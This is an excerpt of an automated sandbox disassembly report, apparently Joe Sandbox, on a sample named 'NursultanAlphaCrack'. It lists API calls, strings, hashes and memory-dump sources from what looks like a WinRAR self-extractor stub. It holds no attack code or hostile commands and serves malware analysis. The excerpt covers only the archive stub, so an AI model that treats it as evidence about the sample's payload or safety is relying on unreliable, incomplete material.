OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 001DDF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 001DDF94
UnmapViewOfFile.KERNEL32(00000000), ref: 001DDFCE

Part of subcall function 001DDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 001DDBF4
Part of subcall function 001DDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 001DDC30

CloseHandle.KERNEL32(00000000), ref: 001DDFD7
GetModuleFileNameW.KERNEL32(00000000,0021EC90,00000800), ref: 001DDFF2
SetEnvironmentVariableW.KERNEL32(sfxname,0021EC90), ref: 001DDFFE
GetLocalTime.KERNEL32(?), ref: 001DE009
_swprintf.LIBCMT ref: 001DE048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 001DE05A
GetModuleHandleW.KERNEL32(00000000), ref: 001DE061
LoadIconW.USER32(00000000,00000064), ref: 001DE078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 001DE0C9
Sleep.KERNEL32(?), ref: 001DE0F7
DeleteObject.GDI32 ref: 001DE130
DeleteObject.GDI32(?), ref: 001DE140
CloseHandle.KERNEL32 ref: 001DE183

Strings

xz!, xrefs: 001DE10B
C:\Users\user\Desktop, xrefs: 001DDF33
winrarsfxmappingfile.tmp, xrefs: 001DDF77
sfxstime, xrefs: 001DE055
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 001DE039
STARTDLG, xrefs: 001DE0BE
sfxname, xrefs: 001DDFF9

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz!
API String ID: 3049964643-979415311
Opcode ID: 9dcbe1fb3998852f23304e35546b8e3c857d53661a3c4a04891e7abaf5117a29
Instruction ID: 132cabcc950dcf567da81f4d40dfbd1d1aa93fcbbe8201e03668f29f6cbb054c
Opcode Fuzzy Hash: 9dcbe1fb3998852f23304e35546b8e3c857d53661a3c4a04891e7abaf5117a29
Instruction Fuzzy Hash: 9E61E371608304AFD720ABA4FC4DF7B77ECAB65704F00042BF94592292DF789A84C7A1

Function 001DA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,001DB73D,00000066), ref: 001DA6D5
SizeofResource.KERNEL32(00000000,?,?,?,001DB73D,00000066), ref: 001DA6EC
LoadResource.KERNEL32(00000000,?,?,?,001DB73D,00000066), ref: 001DA703
LockResource.KERNEL32(00000000,?,?,?,001DB73D,00000066), ref: 001DA712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,001DB73D,00000066), ref: 001DA72D
GlobalLock.KERNEL32(00000000), ref: 001DA73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 001DA762
GlobalUnlock.KERNEL32(00000000), ref: 001DA7C6

Part of subcall function 001DA626: GdipAlloc.GDIPLUS(00000010), ref: 001DA62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 001DA7A7
GlobalFree.KERNEL32(00000000), ref: 001DA7CD

Strings

PNG, xrefs: 001DA6C6

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: 84b68bb065d02cd4221576c1864db72c77cecf7f6c5c90ebe21c06db7d3f7e4b
Instruction ID: d8cb1f4e3d0c1c68c6b8a6f0364d2d698a8bce8eec5f9f8818a3de31630fd75d
Opcode Fuzzy Hash: 84b68bb065d02cd4221576c1864db72c77cecf7f6c5c90ebe21c06db7d3f7e4b
Instruction Fuzzy Hash: 02319F76604302AFD711DF21EC88D2BBBB9EF84760B04051AF91582721EB32DD94CAA1

Function 001CA69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,001CA592,000000FF,?,?), ref: 001CA6C4

Part of subcall function 001CBB03: _wcslen.LIBCMT ref: 001CBB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,001CA592,000000FF,?,?), ref: 001CA6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,001CA592,000000FF,?,?), ref: 001CA6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,001CA592,000000FF,?,?), ref: 001CA728
GetLastError.KERNEL32(?,?,?,?,001CA592,000000FF,?,?), ref: 001CA734

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: c54c238c7efc5ff1bdf5625738285bbbd55d6ea3b5e22226334e8f1b3155fa8e
Instruction ID: 9ef1e835d5fe88e7d2de17e6776aad1991f1a464c8cb31829ff2b2c0d623cfde
Opcode Fuzzy Hash: c54c238c7efc5ff1bdf5625738285bbbd55d6ea3b5e22226334e8f1b3155fa8e
Instruction Fuzzy Hash: 9D415E72500619ABCB25DF68CC84BE9B7B8BF58354F50419AF56DD3200D734AE90CF90

Function 001E7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,001E7DC4,00000000,001FC300,0000000C,001E7F1B,00000000,00000002,00000000), ref: 001E7E0F
TerminateProcess.KERNEL32(00000000,?,001E7DC4,00000000,001FC300,0000000C,001E7F1B,00000000,00000002,00000000), ref: 001E7E16
ExitProcess.KERNEL32 ref: 001E7E28

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: a125d5c55d3456a62c81e0c50ded4718441bd24620eb3b3ab0b0789614a0b752
Instruction ID: c73493c90684d20e1e99734244d3514445da793e8a2a06fac135641bb1d1607f
Opcode Fuzzy Hash: a125d5c55d3456a62c81e0c50ded4718441bd24620eb3b3ab0b0789614a0b752
Instruction Fuzzy Hash: 8AE0BF31004594ABDF116F55DD4A99E7F69EF50341B004455F8198A572CB35EE91CB90

Function 001C848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C8493

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f112ad4692c51218441dc8c78c6159a6dc5aed2db7c0cf4d373a0ab7d4ce3e6f
Instruction ID: 14a6d6312d9d46244e27ec5e374eb89f72217a6011a5ffadd7855985f5e2a523
Opcode Fuzzy Hash: f112ad4692c51218441dc8c78c6159a6dc5aed2db7c0cf4d373a0ab7d4ce3e6f
Instruction Fuzzy Hash: F082D870904285AEDF15DB64C8D5FFABBB9AF35300F0841BDE8499B182DB71DA85CB60

Function 001DB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001DB7E5

Part of subcall function 001C1316: GetDlgItem.USER32(00000000,00003021), ref: 001C135A
Part of subcall function 001C1316: SetWindowTextW.USER32(00000000,001F35F4), ref: 001C1370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001DB8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001DB8EF
IsDialogMessageW.USER32(?,?), ref: 001DB902
TranslateMessage.USER32(?), ref: 001DB910
DispatchMessageW.USER32(?), ref: 001DB91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 001DB93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 001DB960
GetDlgItem.USER32(?,00000068), ref: 001DB983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 001DB99E
SendMessageW.USER32(00000000,000000C2,00000000,001F35F4), ref: 001DB9B1

Part of subcall function 001DD453: _wcslen.LIBCMT ref: 001DD47D

SetFocus.USER32(00000000), ref: 001DB9B8
_swprintf.LIBCMT ref: 001DBA24

Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5

Part of subcall function 001DD4D4: GetDlgItem.USER32(00000068,0021FCB8), ref: 001DD4E8
Part of subcall function 001DD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,001DAF07,00000001,?,?,001DB7B9,001F506C,0021FCB8,0021FCB8,00001000,00000000,00000000), ref: 001DD510
Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 001DD51B
Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,000000C2,00000000,001F35F4), ref: 001DD529
Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001DD53F
Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 001DD559
Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001DD59D
Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001DD5AB
Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001DD5BA
Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001DD5E1
Part of subcall function 001DD4D4: SendMessageW.USER32(00000000,000000C2,00000000,001F43F4), ref: 001DD5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 001DBA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 001DBA90
GetTickCount.KERNEL32 ref: 001DBAAE
_swprintf.LIBCMT ref: 001DBAC2
GetLastError.KERNEL32(?,00000011), ref: 001DBAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 001DBB43
_swprintf.LIBCMT ref: 001DBB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 001DBBD0
GetCommandLineW.KERNEL32 ref: 001DBBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 001DBC47
ShellExecuteExW.SHELL32(0000003C), ref: 001DBC6F
Sleep.KERNEL32(00000064), ref: 001DBCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 001DBCE2
CloseHandle.KERNEL32(00000000), ref: 001DBCEB
_swprintf.LIBCMT ref: 001DBD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001DBD7D
SetDlgItemTextW.USER32(?,00000065,001F35F4), ref: 001DBD94
GetDlgItem.USER32(?,00000065), ref: 001DBD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 001DBDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001DBDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001DBE68
_wcslen.LIBCMT ref: 001DBEBE
_swprintf.LIBCMT ref: 001DBEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 001DBF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 001DBF4C
GetDlgItem.USER32(?,00000068), ref: 001DBF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 001DBF6B
GetDlgItem.USER32(?,00000066), ref: 001DBF85
SetWindowTextW.USER32(00000000,0020A472), ref: 001DBFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 001DC007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001DC01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 001DC0BD
EnableWindow.USER32(00000000,00000000), ref: 001DC197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 001DC1D9

Part of subcall function 001DC73F: __EH_prolog.LIBCMT ref: 001DC744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001DC1FD

Strings

<, xrefs: 001DBB84
-el -s2 "-d%s" "-sp%s", xrefs: 001DBB6B
C:\Users\user\Desktop, xrefs: 001DBBC9
@, xrefs: 001DBB91
winrarsfxmappingfile.tmp, xrefs: 001DBBA6
__tmp_rar_sfx_access_check_%u, xrefs: 001DBAB5
LICENSEDLG, xrefs: 001DC0B2
"%s"%s, xrefs: 001DBD0D
STARTDLG, xrefs: 001DB801
%s, xrefs: 001DBED8

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-2966512602
Opcode ID: 7ef8071a9722ad3b7603f111113182a71f3f29551c98ba197be3a3eb57686ca1
Instruction ID: b58a73e6463d48f7f38cef7604539cb1ffe2cd7aa48863177af75805c1e178eb
Opcode Fuzzy Hash: 7ef8071a9722ad3b7603f111113182a71f3f29551c98ba197be3a3eb57686ca1
Instruction Fuzzy Hash: 3C420971944355FAEB21DBB0AC8EFBE77BCAB21700F00405AF645A62D3CB749A45CB61

Function 001D0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 001D087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001D088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001D08BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001D0B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001D0B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 001D0B93
ReadFile.KERNEL32(00000000,?,00007FFE,001F3C7C,00000000), ref: 001D0BB1
CloseHandle.KERNEL32(00000000), ref: 001D0C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001D0C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,001F3C7C,?,00000000,?,00000800), ref: 001D0C72
GetFileAttributesW.KERNELBASE(?,?,001F3C7C,00000800,?,00000000,?,00000800), ref: 001D0C9C
GetFileAttributesW.KERNEL32(?,?,001F3D44,00000800), ref: 001D0CD8

Part of subcall function 001D081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001D0836
Part of subcall function 001D081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001CF2D8,Crypt32.dll,00000000,001CF35C,?,?,001CF33E,?,?,?), ref: 001D0858

_swprintf.LIBCMT ref: 001D0D4A
_swprintf.LIBCMT ref: 001D0D96

Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5

AllocConsole.KERNEL32 ref: 001D0D9E
GetCurrentProcessId.KERNEL32 ref: 001D0DA8
AttachConsole.KERNEL32(00000000), ref: 001D0DAF
_wcslen.LIBCMT ref: 001D0DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 001D0DD5
WriteConsoleW.KERNEL32(00000000), ref: 001D0DDC
Sleep.KERNEL32(00002710), ref: 001D0DE7
FreeConsole.KERNEL32 ref: 001D0DED
ExitProcess.KERNEL32 ref: 001D0DF5

Strings

uxtheme.dll, xrefs: 001D0D17
SetDefaultDllDirectories, xrefs: 001D08B9
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 001D0D84
DXGIDebug.dll, xrefs: 001D08FC, 001D0C5E
SetDllDirectoryW, xrefs: 001D0888
kernel32, xrefs: 001D0873
dwmapi.dll, xrefs: 001D0927, 001D0D0D

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: b1e63bfed6c69ee4a58b62f4b39af126ce5a1ad1062fea94c3c3cdad60322281
Instruction ID: f43f6a9e31edc99e58080536e36bcf5a8530b8af2e9ad3a5d1a6ab9fd9001fd8
Opcode Fuzzy Hash: b1e63bfed6c69ee4a58b62f4b39af126ce5a1ad1062fea94c3c3cdad60322281
Instruction Fuzzy Hash: FED164B1408388ABD731DF50C949BFFBAE8BF95704F50491EF399A6250CB709649CB62

Function 001DC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 001DC744

Part of subcall function 001DB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 001DB3FB

_wcslen.LIBCMT ref: 001DCA0A
_wcslen.LIBCMT ref: 001DCA13
SetWindowTextW.USER32(?,?), ref: 001DCA71
_wcslen.LIBCMT ref: 001DCAB3
_wcsrchr.LIBVCRUNTIME ref: 001DCBFB
GetDlgItem.USER32(?,00000066), ref: 001DCC36
SetWindowTextW.USER32(00000000,?), ref: 001DCC46
SendMessageW.USER32(00000000,00000143,00000000,0020A472), ref: 001DCC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001DCC7F

Strings

<br>, xrefs: 001DC9D4
%s.%d.tmp, xrefs: 001DC940
ProgramFilesDir, xrefs: 001DCB45
Software\Microsoft\Windows\CurrentVersion, xrefs: 001DCB1A

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: 735850bc8d503106c5093dbb10bbf79a3e8dddfb8976f3fd4e7e7708c6454035
Instruction ID: 320fa09b223255660b9613b632ed4be346ccf38426754503e08f82daa027cf18
Opcode Fuzzy Hash: 735850bc8d503106c5093dbb10bbf79a3e8dddfb8976f3fd4e7e7708c6454035
Instruction Fuzzy Hash: EAE152B2900259AADB25DBA4ED85EEE73BCAB14350F4045A7F609E7140EF749F84CF60

Function 001CDA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001CDA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001CDAAC

Part of subcall function 001CC29A: _wcslen.LIBCMT ref: 001CC2A2

Part of subcall function 001D05DA: _wcslen.LIBCMT ref: 001D05E0

Part of subcall function 001D1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,001CBAE9,00000000,?,?,?,00010440), ref: 001D1BA0

_wcslen.LIBCMT ref: 001CDDE9
__fprintf_l.LIBCMT ref: 001CDF1C

Strings

RTL, xrefs: 001CDEDE
*messages***, xrefs: 001CDBFA
,, xrefs: 001CDF57
a, xrefs: 001CDC16
*messages***, xrefs: 001CDBC1
$%s:, xrefs: 001CDEFF
R, xrefs: 001CDC0C
, xrefs: 001CDD6C
@%s:, xrefs: 001CDF06, 001CDF12

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMulusermeWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 1ec2e87e4f2cf17438a497424379f0c9e294676f5e1506cc93609ee383f47625
Instruction ID: 77434fea6e7075c9e7754c1468b5e9f8b60bfef29cb6999714f48b090ca0bc0f
Opcode Fuzzy Hash: 1ec2e87e4f2cf17438a497424379f0c9e294676f5e1506cc93609ee383f47625
Instruction Fuzzy Hash: 1932BF71A00258AACB24EF64D846FEE77A5FF28704F44016EF90697281E7B1DD95CB90

Function 001DD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001DB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001DB579
Part of subcall function 001DB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001DB58A
Part of subcall function 001DB568: IsDialogMessageW.USER32(00010440,?), ref: 001DB59E
Part of subcall function 001DB568: TranslateMessage.USER32(?), ref: 001DB5AC
Part of subcall function 001DB568: DispatchMessageW.USER32(?), ref: 001DB5B6

GetDlgItem.USER32(00000068,0021FCB8), ref: 001DD4E8
ShowWindow.USER32(00000000,00000005,?,?,?,001DAF07,00000001,?,?,001DB7B9,001F506C,0021FCB8,0021FCB8,00001000,00000000,00000000), ref: 001DD510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 001DD51B
SendMessageW.USER32(00000000,000000C2,00000000,001F35F4), ref: 001DD529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001DD53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 001DD559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001DD59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001DD5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001DD5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001DD5E1
SendMessageW.USER32(00000000,000000C2,00000000,001F43F4), ref: 001DD5F0

Strings

\, xrefs: 001DD549

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

